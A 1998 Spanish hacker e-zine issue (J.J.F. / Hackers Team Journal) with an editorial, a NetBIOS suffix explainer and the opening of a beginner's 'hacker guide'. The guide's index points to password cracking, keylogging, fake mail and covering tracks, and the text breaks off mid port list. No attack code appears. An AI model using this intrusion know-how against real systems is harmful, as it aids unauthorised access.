. . . . . . . . . . . . . . . . . . . . . . . . Ü . ÛÜ . Ü . Û . Û . . . . . . . ÛÜÛÛÛÜÛÜÛÛÛÜÜÛÛÛÛÜÛÛÛÜÛÛÛÛÜÛÛÜ . . . . . ³ ÚÄÄÄÄÄÄ¿ ³ . . . . . . ³ ³ÛÛÛÛÛÛ³ ³ . . . . ³ ÚÄÄÄÄÄÄ´ÛÛÚÄÄÄÙ ³ . . . . . ³ ÚÄÄÄÄÄÄ´ÛÛÛÛÛÛ³ÛÛÀÄ¿ ³ . . . . . . . ³ ³ÛÛÛÛÛÛÃÄ¿ÛÛÚÄ´ÛÛÛÛ³ ³ . . . ³ ÀÄ¿ÛÛÚÄÁ¿³ÛÛ³J³ÛÛÚÄÙ ³ . . . . . . . ³ ÚÄÄ¿³ÛÛ³ÛÛÀÙÛÛ³J³ÛÛ³ ³ . . . . . ³ ³ÛÛÀÙÛÛ³ÛÛÛÛÛÛ³FÃÄÄÙ ³ . . . . ³ ³ÛÛÛÛÛÛÃÄÄÄÄÄÄÁÄÙ ³ . . . . . . ³ ÀÄÄÄÄÄÄÙ ³ . . . . . ³ H A C K E R S T E A M ³ . . . . . . ³ J O U R N A L ³ . . . . ÌÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĹ . . . Ü Ü ÜÛÛ .Û³ VOL. #2, N§7, 1998. ³ . Ü Û . ÛÛÜÛÜÛÛÜÛÜÜÛÛÜÛÛÛÛÛÜÛÜÛÛÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄļÛÜÛÜÜÜÛÛÛÜÛÛÜÛÛÜÜÛÜÛÛÜÛÜ IS COMPUTERWORLD TURNING HONEST CITIZENS INTO CRIMINALS? -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Nota: - J.J.F. / HACKERS TEAM - no se hace responsable del mal uso de la informacion aqui expuesta y tampoco tiene que estar de acuerdo con lo que sus colaboradores opinen. Tampoco esperamos que la gente use la informacion aqui expuesta para hacer da¤o ya que tan solo es con fines didacticos. Recomendado el uso del editor del MS-DOS. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= #CURRENT MEMBERS : - CONDE VAMPIRO - CODER H/P/V EDITOR - MAC CRACK - CODER C/P WEBMASTER - Mr ELEKTRO - H/P ADMIN - TASSLEHOFF - CODER H CO-WEBMASTER - Dr BINIX - CODER H/P/V/C ADMIN #WEB OFICIAL : - http://www.jjf.org #E-MAIL OFICIAL : - team@jjf.org #LLAVE PGP OFICIAL : -----BEGIN PGP PUBLIC KEY BLOCK----- - J.J.F. / Hackers Team - http://www.jjf.org Version: PGPfreeware 5.5.3i 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 =HQVG -----END PGP PUBLIC KEY BLOCK----- #DISTRIBUIDORES OFICIALES DEL E-ZINE : - http://wakanda.islatortuga.com - http://underhack.islatortuga.com - http://personal.redestb.es/cheroky-1 - http://members.xoom.com/baron_rojo/ - http://members.xoom.com/rifoxxx - http://www.bigfoot.com/~u_taker - http://phucksys.dyn.ml.org - http://www.bigfoot.com/~proyecto_r - http://members.xoom.com/zine_store/ - http://visitweb.com/disciples #MIEMBRO OFICIAL (web ring) DE : - Black Angels - Spanish Underground Web Ring #COLABORADORES CON ESTE NUMERO : - {CyBoRg} (SHG Security) - EiVoL (Hack Trax & HoLoCaUsTo) - Bisho - PoSiDoN - Nobody #SALUDOS : - Metalslug (Wakanda) - NeonSurge (Rhino9) - Schoddy Guy (Underhack) - L0pth - Cheroky - Ivan Arce (CORE SDI S.A.) - Silicon Dragon - Proyecto R - Paseante (SET) - SHG Security - Dr Slump (oioio) <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> - INDICE. TITULO AUTOR ÄÄÄÄÄÄÄÄÄÄÄÄ\_______________________________/ÄÄÄÄÄÄÄÄÄÄÄÄ * EDITORIAL ................................ J.J.F. / HACKERS TEAM * SIGNIFICADO DE NETBIOS ................... {CYBORG}. * LA SUPER GUIA DEL HACKER VERSION DELUXE ........................... NOBODY. * CYBERANGEL: UN PROGRAMA, UN PASSWORD, UN MONTON DE SEGURIDAD ......... MAC CRACK & TASSLEHOFF. * CURSO DE HACK VII ........................ CONDE VAMPIRO. * TROYANOS EN LINUX ........................ POSIDON. * TODO (O CASI TODO) SOBRE El SMURFING V1.0 ......................... MAC CRACK. * UTILIDADES DCL PARA EL HACKER DE VMS ..... EIVOL. * QUE ES UN HACKER ......................... TASSLEHOFF. * CONSEAL PC FIREWALL BUG .................. BISHO. * EL LECTOR OPINA .......................... VARIOS. * NOTICIAS UNDERGROUND ..................... J.J.F. / HACKERS TEAM <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ------------- ³ EDITORIAL ³ ------------- Bueno chicos, tras un largo periodo hemos vuelto como siempre, pero esta vez tenemos buenos motivos para a ver sacado este numero en esta fecha concreta, pues resulta que cumplimos 1 A¤O de revista :)))) Quien lo diria, cuando empezamos esta loca odisea, algunos nos criticaron pero poco a poco hemos demostrado que estamos a la altura de cualquier ezine. Decir que este esfuerzo a sido gracias a muy pocos, ya que todavia necesitamos que la gente escriba articulos, ya que si no no haremos gran cosa, pero en fin seguiremos como siempre. Como haveis podido comprobar, estamos muy activos ya que ahora tenemos domimo propio :) hemos comenzado la distribucion de nuestros "white papers" conocidos como - J.J.F. / Hackers Team - Security Documentation, tambien estamos distribuyendo nuestro software de seguridad y llevando un equipo de voluntarios para participar en el concurso internacional de RC5, conocido como JJF RC5 Crack Team, en el cual esperamos que todos vosotros que nos leeis, os apunteis :)) Estad atentos a todos los cambios que se han producido en - J.J.F. / Hackers Team -, los cuales han sido muchos, como TODAS NUESTRAS DIRECCIONES DE CORREO ademas de NUESTRA NUEVA LLAVE PGP. Por lo que para poneros en contacto con nosotros debeis usar las nuevas direcciones. Por otro lado, tenemos un nuevo miembro en nuestras filas, Dr Binix al cual le damos la bienvenida en - J.J.F. / Hackers Team -. Tambien tenemos 3 distribuidores mas que son los siguientes http://www.bigfoot.com/~u_taker llevado por TAkER y el otro es http://phucksys.dyn.ml.org llevado por GabberMan, y por ultimo el website http://members.xoom.com/zine_store/ llevado por MAU, el siguiente es http://visitweb.com/disciples llevado por Avathar. Como vereis muchas cosas han cambiado, nos hemos vuelto mas abiertos, en el sentido del website, ya que nuestra intencion no es inducir a la delincuenia sino todo lo contrario, ayudar a mejorar la seguridad y ayudar a los admin's a que conozcan los peligros pero tambien sin olvidarnos todas esas personas que quieren ser hackers, o sea nuestros fieles lectores. En nuestro nuevo domino notareis muchos cambios que seguro que os seran muy gratos y recomendamos leer nuestro FAQ, el cual os resolvera todas las dudas que tengais. Para cualquier articulo, duda, consulta sobre el ezine, simplemente debeis escribir a nuestro buzon de mail: editor@jjf.org - J.J.F. / HACKERS TEAM - <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> /----------------------\ - SIGNIFICADO DE NETBIOS - \----------------------/ Bueno os mando algo sobre netbios, espero que os guste. Vamos a ver por donde empezamos, cuantas veces habeis echo un nbtstat y os han salido un monton de cosas y no sabeis el significado de ellas, solo con saber si hay un <20> os basta, pero esto no es asi, hay que saber el porque de cada cosa. Asi que en este texto os explicare que significa cada cosa rara que sale. Los nombres de NETBIOS pueden tener una loguitud de 16 caracteres y el caracter 16th es especial que es usado por los servicios de red de microsoft. Hay dos tipos en un entorno NetBIOS, Unique (unico) y Group (Grupo). Un nombre unique deber ser unico en la red, mientras que un nombre Group no tiene porque ser unico y todos los procesos que tiene un determinado grupo, pertenecen al grupo. Cada nodo NetBIOS mantiene una tabla de todos los nombres actuales en el nodo. La siguiente tabla de NetBIOS, muestra los poxibles subfijos en hexadecimal. Name Number Type Usage 00 U Workstation Service 01 U Messenger Service <\\_MSBROWSE_> 01 G Master Browser 03 U Messenger Service 06 U RAS Server Service 1F U NetDDE Service 20 U File Server Service 21 U RAS Client Service 22 U Exchange Interchange 23 U Exchange Store 24 U Exchange Directory 30 U Modem Sharing Server Service 31 U Modem Sharing Client Service 43 U SMS Client Remote Control 44 U SMS Admin Remote Control Tool 45 U SMS Client Remote Chat 46 U SMS Client Remote Transfer 4C U DEC Pathworks TCPIP Service 52 U DEC Pathworks TCPIP Service 87 U Exchange MTA 6A U Exchange IMC BE U Network Monitor Agent BF U Network Monitor Apps 03 U Messenger Service 00 G Domain Name 1B U Domain Master Browser 1C G Domain Controllers 1D U Master Browser 1E G Browser Service Elections 1C G Internet Information Server 00 U Internet Information Server [2B] U Lotus Notes Server IRISMULTICAST [2F] G Lotus Notes IRISNAMESERVER [33] G Lotus Notes Forte_$ND800ZA [20] U DCA Irmalan Gateway Service Unique (U) .- Debe tener solamente una IP asignada. Group (G) .- El nombre unico debe existir con varias direcciones IP. Multihomed (M) .- El nombre es unico, pero debido a varias tarjetas de red en el mismo ordenador, se le permite en la registracion. Numero maximo de direcciones es 25. Internet Group (I) .- Configuracion especial del grupo, nombre usado por el nombre de dominios de WINNT. Domain Name (D) .- Esto es nuevo en NT 4.0. Nombre del dominio. 1.- TIPO UNIQUE significado del 16th: <00> Nombre del servicio de la estacion de trabajo, este es el nombre al que se refiere el nombre del NETBIOS. <03> Nombre del servico de mensajeria, es usado cuando recibimos o emviamos mensajes. Este nombre esta registrado con el servidor WINS. <1B> Nombre del Dominio Principal. Identifica al primer contralador de Dominio. <06> Servicio de servidor RAS. <1F> Servicio NetDDE. <20> Nombre del servicio servidor, nos indica que hay algo compartido. <21> Cliente RAS. Monitor de agente de red. Utilidad de monitor de red. 2.- TIPO GROUP significado del 16th: <1C> Nombre del grupo de dominio. Contiene la lista de dirreciones los equipos que estan registrados en el dominio. <1D> Nombre del master Browser, es usado por los equipos clientes para acceder a =e9l. <1E> Nombre de un grupo normal. <20> Nombre de un grupo especial, llamado grupo de internet que es registrado con un servidor de WINS que identifica grupos de equipos con fines administrativos. _MSBROWSE_ Va en relacion con el nombre del Dominio. Para un rapido testeo de todo esto, se pueden utilizar los siguientes comandos desde una ventana de MS-DOS: nbtstat -A direccion IP nbtstat -a Host Las sesiones NetBIOS son bidireccionales, requiere un proceso de cliente y otro de servidor, es decir, requiere la cooperacion de 2 ordenadores. La mayoria de NetBIOS implementada para TCP/IP lleva a cabo una resolucion de nombres pero usando cualquier broadcast o fichero LMHOSTS. Cuando NetBIOS esta sobre TCP/IP se le conoce como modulo NBT. Tambien tenemos el SMB (Servidor Mensajes Bloque), es un tipo de protocolo de mensajeria en una LAN entre clientes y servidores, que se usa para comunicarse entre ellos. El SMB es un protocolo de nivel superior que puede ser transportado sobre NetBEUI, NetBIOS sobre IPX y NBT. SMB es usado por Windows 3.x, Win95, WinNT y OS/2. Permite acceder a directorios remotamente. Texto escrito por: {CyBoRg} SHG Security <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> 02-11-1998. ?????? °±°±²±°±²±°±²±°±²±°±²±°±²±°±²±°±²±° °±ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»±° °±ºÚ LA SUPER GUIA DEL HACKER ¿º±° °±º³ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»³º±° °±º³ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ³º±° °±ºÀ by Nobody Ùº±° °±ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ±° °±°±²±°±²±°±²±°±²±°±²±°±²±°±²±°±²±° <<<<<<<<<>>>>>>>>>> ()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()() Nota Del Autor: No me hago responsable de la mala utilizacion de la informacion aqui expuesta ya que tan solo es para fines didacticos. Esta guia es de distribucion libre excepto para las instituciones gubernamentales que deberan abonar 2000 pts a alguna fundacion para apadrinar ni¤os. ()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()() - INDICE: 1 ......................... Que Es Esta Guia Exactamente ? 2 ......................... Descripcion General De Windows. 2-1 ...................... Seguridad En Windows. 3 ......................... Protocolo TCP/IP y Demas Historias. 3-1....................... Puertos. 3-2....................... Ftp. 3-3....................... Telnet. 4 ......................... Hacking Basico En Windows. 4-1 ...................... Phf. 4-2 ...................... Ftp. 4-3 ...................... Ping De La Muerte. 4-4 ...................... Recursos Compartidos. 4-5 ...................... Fake Mail Con El Telnet. 4-6 ...................... Cambiando El Entorno. 4-7 ...................... Finger. 4-8 ...................... Whois. 4-9 ...................... Tracert. 4-10 ..................... Winipcfg. 4-11 ..................... Ipconfig. 4-12 ..................... Arp. 4-13 ..................... Route. 4-14 ..................... Netstat. 5 ......................... Utilizacion De Tools. 5-1 ...................... SkamWerks Lab version 1.1b. 5-2 ...................... WaReZ! Version 95.12.31. 5-3 ...................... John the Ripper v1.4. 5-4 ...................... Gobbler v 2.1. 5-5 ...................... Sharepasswd. 5-6 ...................... Snadboy's Revelation v1.1. 5-7 ...................... Keylog95. 5-8 ...................... Glide. 5-9 ...................... Win95 AnonyMail v 1.0. 5-10 ..................... Hacker's Utility, V 1.02. 5-11 ..................... Haktek v1.1. 5-12 ..................... Claymore Brute Force. 5-13 ..................... Skream's Port Listener V 2.3. 5-14 ..................... WSOCK32 Winsock Spy Facility Version .91 5-15 ..................... PWlTool V 4.0. 5-16 ..................... PwlView V 1.01. 6 ......................... Medidas De Seguridad. 6-1 ...................... Protegiendo Nuestro Ordenador. 6-1 ..................... Ataques Tipicos a Nuestro Windows. 6-2 ..................... Encriptacion De Nuestra Informacion. 6-3 ..................... Eliminar Informacion De Forma Segura. 6-4 ..................... Eliminacion De Virus. 6-1-1 .................... Protegiendo Nuestras Acciones. 6-1-1-1 ................. Borrando Nuestras Huellas. 6-1-1-2 ................. Encriptando Nuestro Correo. 7 ......................... Sugerencias Para Un Mejor Hacking. 8 ......................... Obtener Informacion. 9 ......................... Despedida. 9-1 ...................... Agradecimientos. ()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()() 1. Que Es Esta Guia Exactamente ? Esta guia esta enfocado hacia todo aquel que quiere ser hacker pero no quiere aprender unix o no lo sabe manejar (grave error). Pues por esta razon esta guia esta enfocada a los usuarios de windows, principalmente los de win95/98. Por el contrario esta guia no se dedicara al NT o Unix, aunque por supuesto se hara referencia a estos sistemas sobre todo cuando son estos mismos Sistemas Operativos en los cuales se centraran nuestros actos, supuestamente legales :) Todo esto que digo puede sonar tonterias y puedes pensar que en win95/98 no podras llegar a ser un gran hacker porque es necesario conocer unix, y estoy totalmente de acuerdo, pero solo pretendo dar una oportunidad para hacer sus pinitos a aquellos que solo saber usar win95/98, yo por mi parte aconsejo aprender unix por varias razones que no viene a cuento en esta guia. Con esta guia te convertiras en un magnifico Hacker usando un sistema que no es propenso al hacking. Como es normal al usar win95/98 estaremos muy limitados en muchos aspectos pero podras aprender por ejemplo, algunos bug que podras usar en tu favor, la utilizacion de diversas herramientas hacker que no estan disponibles generalemente en win95/98 y ademas a usar los recursos que te ofrece Internet en tu favor, abreviando un poco tanta charla, llegaras a conocer la red de una forma diferente y a manejar win95/98 de forma distinta a lo conocido hasta ahora. Esta es la version Deluxe, de mi conocida guia LA SUPER GUIA DEL HACKER, la cual a sido revisada y actualizada, algunas herramientas como el Bo o Netbus no seran explicadas debido a que son realmente faciles de usar y ademas disponen de gran variedad de opciones y me saldria un documento monstruoso. Al igual que me he dejado muchas cosas, que a lo mejor gustaria que explicara pero realmente es imposible explicarlo todo, ademas el espiritu hacker es aquella persona que simplemente quiere conocer pero debe investigar por si misma, de nada sirve que este todo hecho. Por eso os digo: "Si juegas a Hacker, piensa como un Hacker." Surfeando por Internet, he encontrado esta guia pasada a HTML y lo mas curioso es que han quitado mi nick del documento (que raro };-), pues para estos plagiadores, aqui teneis la version Deluxe para que la volvais a copiar!!!!! 2. Descripcion General De Windows. Como todos sabemos el windows95/98 es un popular sistema operativo de la casa Microsoft, el cual es conocido tanto por sus adepto ya que es muy sencillo y vistoso pero al igual tambien es muy conocido por su inseguridad en casi todos sus aspectos, ademas no ofrece tanta versativilidad como otros sistemas operativos. Por ejemplo este es el caso de su "Multitarea" la cual es virtual y no real, si quieres hacer la prueba pon en marcha el defrag y ejecuta otro programa :) y veras esa famosa Multitarea. El win95/98 es un sistema operativo de 32 bits multitarea, que es muy comodo para la gente que busca facilidad, pero no te enga¤es pensando que es un sistema ideal para Internet, puede que para un usuario convencional le sea estupendo pero para un Hacker se queda muy corto de calle, ya que le falta muchos servicios que otros sistemas operativos si traen como el que ya tantas veces he repetido, el Unix (se nota que me encanta??:). Aqui os dejo de dar la murga sobre win95/98 ya que este texto no esta destinado a hablar sobre este sistema sino a usarlo para hackear. Ademas no creo que este contando nada nuevo sobre windows o sea que mejor me callo y si no sabes mucho sobre win95/98, pues ya sabes comprate un libro. 2-1. Seguridad En Windows. Como todos sabemos la seguridad en win95/98 es nula, es decir, win95/98 no tiene seguridad por si mismo, un claro ejemplo de esto que es las ventanas que nos piden un password las podemos cerrar pulsando sobre la X o tambien nos basta con pulsar ctrl+atl+supr, con lo que nos salteremo esta ventana sin meter ningun password. Por eso para que nuestro ventanas (nombre que se le da a win95/98 :) tendremos que instalarle algun paquete de seguridad disponible por la red, que hay muchos y buenos y lo mejor es que son Freeware (gratis) aunque siempre puedes comprar algun paquete comercial de seguridad, en mi opinion alguna veces una tonteria, ya que nos pueden cobrar un precio abusivo y cuando llega la oportunidad de demostrar su calidad nos falla, ya que no hay nada seguro 100%. Proteger nuestro win95/98 es cosa de cada uno pero tranquilidad, que la cosa no es muy dificil, es cuestion de estar atento a las novedades, en otras palabras estar informado. Mas abajo ya te entereras de estas cosas. 3. Protocolo TCP/IP y Demas Historias. El protocolo TCP/IP, es el mas usado y seguramente no lo sabias, ya que engloba casi todos los servicios que solemos usar como por ejemplo cuando hacemos telnet, mail, ftp o cualquier cosa. TCP/IP proviene de Transmission Control Protocol y Internet Protocol respectivamente. Por fortuna para los usuarios de win95/98, este protocolo ya viene incorporado nativamente en el sistema, al contrario que ocurria con el windows 3.x, el cual lo teniamos que instalar para poder conectar a Internet. Como has podido comprobar en realidad son 2 protocolos pero que estan unidos, el primero o sea el TCP es el encargado de las comunicaciones y de la transmision de los paquetes cuando estamos conectados a un servidor. El IP es el encargado de que los paquetes llegen a destino por orden aunque tomen caminos diferentes. * Diagrama del TCP * cliente -> El cliente le envia una -> servidor solicitud de conexion espeficicando el puerto de conexion al servidor. cliente <- El servidor le responde <- servidor que conoce su peticion de conexion. cliente -> El cliente le devuelve <- servidor otra vez la peticion y el circuito ya esta abierto. * Diagrama del IP * ³Informacion general³Direccion IP³Direccion IP³Datos³ ³de cabezera. ³de origen ³de destino. ³ ³ Pues aqui se acaba la explicacion basica de este protocolo, para el que este interesado en profundizar le remito a que se pille el RFC 1180 o un fichero disponible en multitud de servidores, desgraciadamente no te puede asegurar el nombre del fichero ya que lo he encontrado de varias formas pero te dare el nombre que aparece al editarlo, ya que en todos es igual: Introduction to the Internet Protocols C R C S Computer Science Facilities Group C I L S RUTGERS The State University of New Jersey 3 July 1987 3-1. Puertos Antes ya os he explicado muy brevemente la comunicacion del protocolo en cuestion. Pues ahora os pongo una extensa lista sobre los distintos puertos y sus servicios correspondientes. echo 7/tcp echo 7/udp discard 9/tcp sink null discard 9/udp sink null systat 11/tcp systat 11/tcp users daytime 13/tcp daytime 13/udp netstat 15/tcp qotd 17/tcp quote qotd 17/udp quote chargen 19/tcp ttytst source chargen 19/udp ttytst source ftp-data 20/tcp ftp 21/tcp telnet 23/tcp smtp 25/tcp mail time 37/tcp timserver time 37/udp timserver rlp 39/udp resource # resource location name 42/tcp nameserver name 42/udp nameserver whois 43/tcp nicname # usually to sri-nic domain 53/tcp nameserver # name-domain server domain 53/udp nameserver nameserver 53/tcp domain # name-domain server nameserver 53/udp domain mtp 57/tcp # deprecated bootp 67/udp # boot program server tftp 69/udp rje 77/tcp netrjs finger 79/tcp link 87/tcp ttylink supdup 95/tcp hostnames 101/tcp hostname # usually from sri-nic iso-tsap 102/tcp dictionary 103/tcp webster x400 103/tcp # ISO Mail x400-snd 104/tcp csnet-ns 105/tcp pop 109/tcp postoffice pop2 109/tcp # Post Office pop3 110/tcp postoffice portmap 111/tcp portmap 111/udp sunrpc 111/tcp sunrpc 111/udp auth 113/tcp authentication sftp 115/tcp path 117/tcp uucp-path 117/tcp nntp 119/tcp usenet # Network News Transfer ntp 123/udp ntpd ntp # network time protocol (exp) nbname 137/udp nbdatagram 138/udp nbsession 139/tcp NeWS 144/tcp news sgmp 153/udp sgmp tcprepo 158/tcp repository # PCMAIL snmp 161/udp snmp snmp-trap 162/udp snmp print-srv 170/tcp # network PostScript vmnet 175/tcp load 315/udp vmnet0 400/tcp sytek 500/udp biff 512/udp comsat exec 512/tcp login 513/tcp who 513/udp whod shell 514/tcp cmd # no passwords used syslog 514/udp printer 515/tcp spooler # line printer spooler talk 517/udp ntalk 518/udp efs 520/tcp # for LucasFilm route 520/udp router routed timed 525/udp timeserver tempo 526/tcp newdate courier 530/tcp rpc conference 531/tcp chat rvd-control 531/udp MIT disk netnews 532/tcp readnews netwall 533/udp # -for emergency broadcasts uucp 540/tcp uucpd # uucp daemon klogin 543/tcp # Kerberos authenticated rlogin kshell 544/tcp cmd # and remote shell new-rwho 550/udp new-who # experimental remotefs 556/tcp rfs_server rfs# Brunhoff remote filesystem rmonitor 560/udp rmonitord # experimental monitor 561/udp # experimental garcon 600/tcp maitrd 601/tcp busboy 602/tcp acctmaster 700/udp acctslave 701/udp acct 702/udp acctlogin 703/udp acctprinter 704/udp elcsd 704/udp # errlog acctinfo 705/udp acctslave2 706/udp acctdisk 707/udp kerberos 750/tcp kdc # Kerberos authentication--tcp kerberos 750/udp kdc # 